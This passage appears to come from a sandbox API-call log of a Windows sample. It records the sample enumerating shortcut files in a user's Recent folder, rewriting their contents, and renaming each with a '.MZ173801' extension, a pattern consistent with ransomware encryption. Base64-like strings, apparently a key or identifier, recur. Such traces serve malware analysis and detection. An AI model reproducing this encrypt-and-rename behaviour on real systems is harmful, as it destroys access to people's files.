TMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0108.380] GetCurrentThreadId () returned 0x1358 [0108.380] GetCurrentThreadId () returned 0x1358 [0108.380] GetCurrentThreadId () returned 0x1358 [0108.380] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Fhb23ambk-o.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\fhb23ambk-o.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0108.380] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0108.380] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0108.380] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x37a [0108.380] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0108.380] ReadFile (in: hFile=0x3f4, lpBuffer=0x2432c60, nNumberOfBytesToRead=0x37a, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2432c60*, lpNumberOfBytesRead=0x19f9b0*=0x37a, lpOverlapped=0x0) returned 1 [0108.381] CloseHandle (hObject=0x3f4) returned 1 [0108.382] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Fhb23ambk-o.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\fhb23ambk-o.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0108.383] WriteFile (in: hFile=0x3f4, lpBuffer=0x2434c90*, nNumberOfBytesToWrite=0x37a, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2434c90*, lpNumberOfBytesWritten=0x19f9bc*=0x37a, lpOverlapped=0x0) returned 1 [0108.384] CloseHandle (hObject=0x3f4) returned 1 [0108.385] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Fhb23ambk-o.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\fhb23ambk-o.lnk"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Fhb23ambk-o.lnk.MZ173801" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\fhb23ambk-o.lnk.mz173801")) returned 1 [0108.386] GetCurrentThreadId () returned 0x1358 [0108.386] GetCurrentThreadId () returned 0x1358 [0108.386] GetCurrentThreadId () returned 0x1358 [0108.386] GetCurrentThreadId () returned 0x1358 [0108.386] GetCurrentThreadId () returned 0x1358 [0108.386] GetCurrentThreadId () returned 0x1358 [0108.386] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb69bdfe, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xeb69bdfe, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xeb69bdfe, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x3cb, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="Fnu1ZEKDFkx.lnk", cAlternateFileName="FNU1ZE~1.LNK")) returned 1 [0108.386] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0108.386] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0108.386] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Fnu1ZEKDFkx.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\fnu1zekdfkx.lnk"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb69bdfe, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xeb69bdfe, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xeb69bdfe, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x3cb)) returned 1 [0108.387] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0108.387] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0108.387] GetCurrentThreadId () returned 0x1358 [0108.387] GetCurrentThreadId () returned 0x1358 [0108.387] GetCurrentThreadId () returned 0x1358 [0108.388] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0108.388] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0108.388] GetCurrentThreadId () returned 0x1358 [0108.388] GetCurrentThreadId () returned 0x1358 [0108.388] GetCurrentThreadId () returned 0x1358 [0108.388] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Fnu1ZEKDFkx.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\fnu1zekdfkx.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0108.389] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0108.389] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0108.389] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x3cb [0108.389] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0108.389] ReadFile (in: hFile=0x3f4, lpBuffer=0x2432c60, nNumberOfBytesToRead=0x3cb, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2432c60*, lpNumberOfBytesRead=0x19f9b0*=0x3cb, lpOverlapped=0x0) returned 1 [0108.390] CloseHandle (hObject=0x3f4) returned 1 [0108.390] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Fnu1ZEKDFkx.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\fnu1zekdfkx.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0108.391] WriteFile (in: hFile=0x3f4, lpBuffer=0x2434c90*, nNumberOfBytesToWrite=0x3cb, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2434c90*, lpNumberOfBytesWritten=0x19f9bc*=0x3cb, lpOverlapped=0x0) returned 1 [0108.392] CloseHandle (hObject=0x3f4) returned 1 [0108.393] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Fnu1ZEKDFkx.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\fnu1zekdfkx.lnk"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Fnu1ZEKDFkx.lnk.MZ173801" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\fnu1zekdfkx.lnk.mz173801")) returned 1 [0108.394] GetCurrentThreadId () returned 0x1358 [0108.394] GetCurrentThreadId () returned 0x1358 [0108.394] GetCurrentThreadId () returned 0x1358 [0108.394] GetCurrentThreadId () returned 0x1358 [0108.394] GetCurrentThreadId () returned 0x1358 [0108.394] GetCurrentThreadId () returned 0x1358 [0108.394] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9d04a7b8, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x9d04a7b8, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x9d04a7b8, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x4a7, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="fYWa4.lnk", cAlternateFileName="")) returned 1 [0108.394] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0108.394] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0108.394] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\fYWa4.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\fywa4.lnk"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9d04a7b8, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x9d04a7b8, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x9d04a7b8, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x4a7)) returned 1 [0108.395] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0108.395] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0108.395] GetCurrentThreadId () returned 0x1358 [0108.395] GetCurrentThreadId () returned 0x1358 [0108.395] GetCurrentThreadId () returned 0x1358 [0108.396] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0108.396] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, 